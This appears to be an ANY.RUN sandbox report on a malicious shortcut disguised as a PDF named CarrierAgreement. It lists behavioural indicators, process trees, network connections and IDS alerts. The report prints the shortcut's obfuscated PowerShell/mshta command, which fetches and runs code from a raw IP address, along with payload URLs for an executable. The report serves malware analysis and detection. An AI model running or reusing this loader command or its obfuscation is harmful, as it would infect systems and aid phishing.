File name:

CarrierAgreement.pdf.lnk

Full analysis: https://app.any.run/tasks/09bcabcf-0df4-4879-b0a3-a6f625447f14
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: March 24, 2025, 21:33:20
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
loader
installer
qrcode
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles%\Microsoft\Edge\Application\msedge.exe" KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, length=0, window=showminnoactive, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\"
MD5:

0F2138ECCF152F982B8CCA16DEEED260

SHA1:

EF1F7AA1CD1850E986147630C6DB6AE65AF64BFA

SHA256:

54B45729C8A1A2303A8D883CB8A1B5BBADA0E5DB5DFF830EA2AA227A6FDF0663

SSDEEP:

24:8N84ZsxtBff1efVKayWtie/CWgOgfgtgrgfgza88gamgjgYgGugYgd+KgxjgxCg3:8GBX1e3ztoynYUZw+do9aQP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes powershell execution policy (Unrestricted)

      • mshta.exe (PID: 7496)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7604)

    • Request from PowerShell that ran from MSHTA.EXE

      • powershell.exe (PID: 7604)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 7604)

    • Executing a file with an untrusted certificate

      • Final.exe (PID: 7400)

    • Changes the autorun value in the registry

      • Final.exe (PID: 7400)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • mshta.exe (PID: 7496)
      • powershell.exe (PID: 7604)
      • csc.exe (PID: 1128)
      • Final.exe (PID: 7400)

    • The process bypasses the loading of PowerShell profile settings

      • mshta.exe (PID: 7496)

    • Process drops legitimate windows executable

      • mshta.exe (PID: 7496)

    • Executes script without checking the security policy

      • powershell.exe (PID: 7604)

    • Process requests binary or script from the Internet

      • powershell.exe (PID: 7604)

    • Connects to the server without a host name

      • powershell.exe (PID: 7604)

    • Reads Microsoft Outlook installation path

      • OpenWith.exe (PID: 1164)

    • Reads the Windows owner or organization settings

      • MSBuild.exe (PID: 6592)

    • Reads the date of Windows installation

      • MSBuild.exe (PID: 6592)

    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 7496)

    • Probably obfuscated PowerShell command line is found

      • mshta.exe (PID: 7496)

    • Potential Corporate Privacy Violation

      • mshta.exe (PID: 7496)

  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 7496)
      • OUTLOOK.EXE (PID: 7436)

    • Checks proxy server information

      • mshta.exe (PID: 7496)
      • powershell.exe (PID: 7604)
      • slui.exe (PID: 4728)

    • The sample compiled with english language support

      • mshta.exe (PID: 7496)

    • Application launched itself

      • Acrobat.exe (PID: 7772)
      • AcroCEF.exe (PID: 8000)
      • msedge.exe (PID: 7688)

    • Reads Microsoft Office registry keys

      • Acrobat.exe (PID: 7772)
      • OpenWith.exe (PID: 1164)

    • Reads security settings of Internet Explorer

      • OpenWith.exe (PID: 1164)

    • Reads the computer name

      • Final.exe (PID: 7400)
      • MSBuild.exe (PID: 6592)
      • ielowutil.exe (PID: 2968)
      • identity_helper.exe (PID: 7724)

    • Checks supported languages

      • Final.exe (PID: 7400)
      • csc.exe (PID: 1128)
      • cvtres.exe (PID: 5964)
      • MSBuild.exe (PID: 6592)
      • ielowutil.exe (PID: 2968)
      • identity_helper.exe (PID: 7724)

    • Reads the machine GUID from the registry

      • csc.exe (PID: 1128)
      • Final.exe (PID: 7400)
      • MSBuild.exe (PID: 6592)

    • The executable file from the user directory is run by the Powershell process

      • Final.exe (PID: 7400)

    • Create files in a temporary directory

      • Final.exe (PID: 7400)
      • csc.exe (PID: 1128)
      • cvtres.exe (PID: 5964)

    • Reads CPU info

      • MSBuild.exe (PID: 6592)

    • Creates files or folders in the user directory

      • Final.exe (PID: 7400)

    • Reads Windows Product ID

      • MSBuild.exe (PID: 6592)

    • Reads product name

      • MSBuild.exe (PID: 6592)

    • Reads Environment values

      • MSBuild.exe (PID: 6592)
      • identity_helper.exe (PID: 7724)

    • Process checks whether UAC notifications are on

      • OUTLOOK.EXE (PID: 7436)

    • Disables trace logs

      • powershell.exe (PID: 7604)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7604)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 7604)

    • Reads the software policy settings

      • slui.exe (PID: 4728)

    • Local mutex for internet shortcut management

      • iexplore.exe (PID: 7248)

    • Manual execution by a user

      • msedge.exe (PID: 7688)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon
FileAttributes: (none)
TargetFileSize: -
IconIndex: 11
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: powershell.exe
RelativePath: ..\..\..\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLineArguments: . ([char]105+[char]101+[char]120)('m£s£h£££t£££a£ £££h£££t£££tp£:/££/£££9££1.£1£££0£££3£££.2£5£££3£££.££49£/££C£a£££r£££r£ier£££A£g£££r£eem£en££t' -replace '£')"
IconFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
200
Monitored processes
71
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs mshta.exe powershell.exe conhost.exe no specs acrobat.exe acrobat.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe acrocef.exe no specs acrocef.exe no specs openwith.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs final.exe outlook.exe csc.exe conhost.exe no specs cvtres.exe no specs msbuild.exe no specs msbuild.exe acrocef.exe no specs outlook.exe no specs ai.exe no specs ielowutil.exe no specs iexplore.exe iexplore.exe slui.exe msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
744"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6772 --field-trial-handle=2412,i,9853593263394293270,17793880986224112630,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
812"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=gpu-process --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2692 --field-trial-handle=1668,i,10068507193833725143,4915845907437535524,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:2C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
904"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6528 --field-trial-handle=2412,i,9853593263394293270,17793880986224112630,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
920"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=gpu-process --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2580 --field-trial-handle=1668,i,10068507193833725143,4915845907437535524,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:2C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1012"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFinal.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Exit code:
4294967295
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
1128"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\xwz152rb.cmdline"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Final.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ole32.dll
1164C:\WINDOWS\system32\OpenWith.exe -EmbeddingC:\Windows\System32\OpenWith.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Pick an app
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\openwith.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
2316"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2408 --field-trial-handle=2412,i,9853593263394293270,17793880986224112630,262144 --variations-seed-version /prefetch:2C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2384"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2840 --field-trial-handle=1668,i,10068507193833725143,4915845907437535524,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
2968"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -EmbeddingC:\Program Files (x86)\Internet Explorer\ielowutil.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Low-Mic Utility Tool
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\program files (x86)\internet explorer\ielowutil.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
Total events
61 210
Read events
60 562
Write events
562
Delete events
86

Modification events

(PID) Process:(7496) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(7496) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(7496) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(7604) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithProgids
Operation:writeName:Acrobat.Document.DC
Value:
(PID) Process:(7772) Acrobat.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2034283098-2252572593-1072577386-2659511007-3245387615-27016815-3920691934
Operation:writeName:DisplayName
Value:
Adobe Acrobat Reader Protected Mode
(PID) Process:(7896) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\ExitSection
Operation:writeName:bLastExitNormal
Value:
0
(PID) Process:(7896) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVEntitlement
Operation:writeName:bSynchronizeOPL
Value:
0
(PID) Process:(7896) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral
Operation:writeName:uLastAppLaunchTimeStamp
Value:
(PID) Process:(7896) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral
Operation:writeName:iNumAcrobatLaunches
Value:
7
(PID) Process:(7896) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\NoTimeOut
Operation:writeName:smailto
Value:
5900
Executable files
11
Suspicious files
535
Text files
92
Unknown types
0

Dropped files

PID
Process
Filename
Type
7604powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_l23tpoxb.hfy.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7316powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_j1qrhgul.tqi.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7896Acrobat.exeC:\Users\admin\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.jsonbinary
MD5:837C1211E392A24D64C670DC10E8DA1B
SHA256:8013AC030684B86D754BBFBAB8A9CEC20CAA4DD9C03022715FF353DC10E14031
7896Acrobat.exeC:\Users\admin\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.1.20093.6 2025-03-24 21-33-42-732.logtext
MD5:460C6041966002D8384A18C895A65EB0
SHA256:C83EC6E8FB3EC62481289C033238C1D9B08DB8076EAAD304099FD7A7F594F1B9
7316powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PXKFMN3XGZC6H4F6DZIJ.tempbinary
MD5:E202BC7D45EC7F507C5368AC438CBEEB
SHA256:4DB77DE698228E9654E0622A063EE589AAB952EB545510D3A8E6B877B25EAFCA
8000AcroCEF.exeC:\Users\admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RF10fa02.TMPtext
MD5:D012E5B4EB91B61F6E8AE2F8EC3C623E
SHA256:1BDA750084F20306722008016420E1912BA608CA8EFB9C661F7E7EFCF5E89673
7316powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:74B2D16570A6C932D57DEEB0E8700D12
SHA256:B6E9D6EA2089FA279A9FB87342E9CC76F18EC0332E8A03E409EBC7DC44C9E2E5
7496mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\CarrierAgreement[1]executable
MD5:B3B83C8B4686419A690EEE7F2C3E73FB
SHA256:D98FC9C845871B177852D1AC2A2FAF9EBDF6CF785339A43A7EB7FC63AFAB515A
7316powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\c2dc68ba59003e58.customDestinations-msbinary
MD5:E202BC7D45EC7F507C5368AC438CBEEB
SHA256:4DB77DE698228E9654E0622A063EE589AAB952EB545510D3A8E6B877B25EAFCA
7604powershell.exeC:\Users\admin\AppData\Roaming\1.pdfpdf
MD5:092366C2838CBCF53E3C32CAC176EB2E
SHA256:B36AD4DB02612395DAF3F03FBEA0FC0840589EB92E43B7C0312969D245CCDAF4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
209
TCP/UDP connections
170
DNS requests
134
Threats
38

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
91.103.253.49:80
http://91.103.253.49/CarrierAgreement
unknown
unknown
7604
powershell.exe
GET
200
91.103.253.49:80
http://91.103.253.49/1.pdf
unknown
unknown
7604
powershell.exe
GET
200
91.103.253.49:80
http://91.103.253.49/Final.exe
unknown
unknown
OPTIONS
204
3.219.243.226:443
https://p13n.adobe.io/psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&adcProductLanguage=en-us&adcVersion=23.1.20093&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RU&adcXAPIClientID=api_reader_desktop_win_23.1.20093&encodingScheme=BASE_64
unknown
unknown
HEAD
200
23.50.131.78:443
https://uci.cdn.office.net/mirrored/smartlookup/current/scripts/microsoft.office.smartlookup.ssr.js
unknown
unknown
HEAD
200
23.50.131.89:443
https://uci.cdn.office.net/mirrored/smartlookup/current/version.json
unknown
unknown
GET
200
52.111.236.4:443
https://messaging.lifecycle.office.com/getcustommessage16?app=6&ui=en-US&src=BizBar&messagetype=BizBar&hwid=04111-083-043729&ver=16.0.16026&lc=en-US&platform=10%3A0%3A19045%3A2%3A0%3A0%3A256%3A1%3A&productid=%7B1717C1E0-47D3-4899-A6D3-1022DB7415E0%7D%3A00411-10830-43729-AA720%3AOffice%2019%2C%20Office19Professional2019R_Retail%20edition&clientsessionid=%7B5D8F25AF-E550-40ED-B816-0426C6DDD0AB%7D&datapropertybag=%7B%22Audience%22%3A%22Production%22%2C%22AudienceGroup%22%3A%22Production%22%2C%22AudienceChannel%22%3A%22CC%22%2C%22Flight%22%3A%22ofsh6c2b1tla1a31%2Cofcrui4yvdulbf31%2Cofhpex3jznepoo31%2Cofpioygfqmufst31%22%7D
unknown
text
542 b
whitelisted
GET
200
23.50.131.78:443
https://uci.cdn.office.net/mirrored/smartlookup/current/main_ssr.html?culture=en-US&appName=OUTLOOK&apptheme=0&disableTelemetry=0&isBrowserPane
unknown
html
391 Kb
whitelisted
GET
200
23.35.236.137:443
https://geo2.adobe.com/
unknown
text
48 b
whitelisted
GET
200
23.50.131.86:443
https://omex.cdn.office.net/addinclassifier/officesharedentities
unknown
text
314 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
7496
mshta.exe
91.103.253.49:80
Leaseweb Deutschland GmbH
DE
unknown
7604
powershell.exe
91.103.253.49:80
Leaseweb Deutschland GmbH
DE
unknown
8184
AcroCEF.exe
95.100.184.205:443
geo2.adobe.com
AKAMAI-AS
FR
whitelisted
8184
AcroCEF.exe
50.16.47.176:443
p13n.adobe.io
AMAZON-AES
US
whitelisted
7436
OUTLOOK.EXE
52.123.129.14:443
ecs.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
6592
MSBuild.exe
212.18.104.245:443
Anas Firas Flayyih Al-Qaysi
GB
unknown
8184
AcroCEF.exe
2.23.244.205:443
armmf.adobe.com
Ooredoo Q.S.C.
QA
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
google.com
  • 142.250.186.110
whitelisted
geo2.adobe.com
  • 95.100.184.205
whitelisted
p13n.adobe.io
  • 50.16.47.176
  • 54.224.241.105
  • 34.237.241.83
  • 18.213.11.84
whitelisted
ecs.office.com
  • 52.123.129.14
  • 52.123.128.14
whitelisted
armmf.adobe.com
  • 2.23.244.205
whitelisted
omex.cdn.office.net
  • 2.22.242.226
  • 2.22.242.104
  • 2.22.242.97
  • 2.22.242.130
whitelisted
acroipm2.adobe.com
  • 2.22.242.11
  • 2.22.242.123
whitelisted
messaging.lifecycle.office.com
  • 52.111.236.4
whitelisted
self.events.data.microsoft.com
  • 40.79.141.153
whitelisted

Threats

PID
Process
Class
Message
7496
mshta.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
7496
mshta.exe
Misc activity
ET INFO Packed Executable Download
7496
mshta.exe
Potentially Bad Traffic
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
7604
powershell.exe
Potentially Bad Traffic
ET INFO Dotted Quad Host PDF Request
7604
powershell.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
6592
MSBuild.exe
Generic Protocol Command Decode
SURICATA HTTP request header invalid
6592
MSBuild.exe
Generic Protocol Command Decode
SURICATA HTTP request field missing colon
6592
MSBuild.exe
Generic Protocol Command Decode
SURICATA HTTP METHOD terminated by non-compliant character
6592
MSBuild.exe
Generic Protocol Command Decode
SURICATA HTTP URI terminated by non-compliant character
Generic Protocol Command Decode
SURICATA HTTP request field missing colon
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
CarrierAgreement.pdf.lnk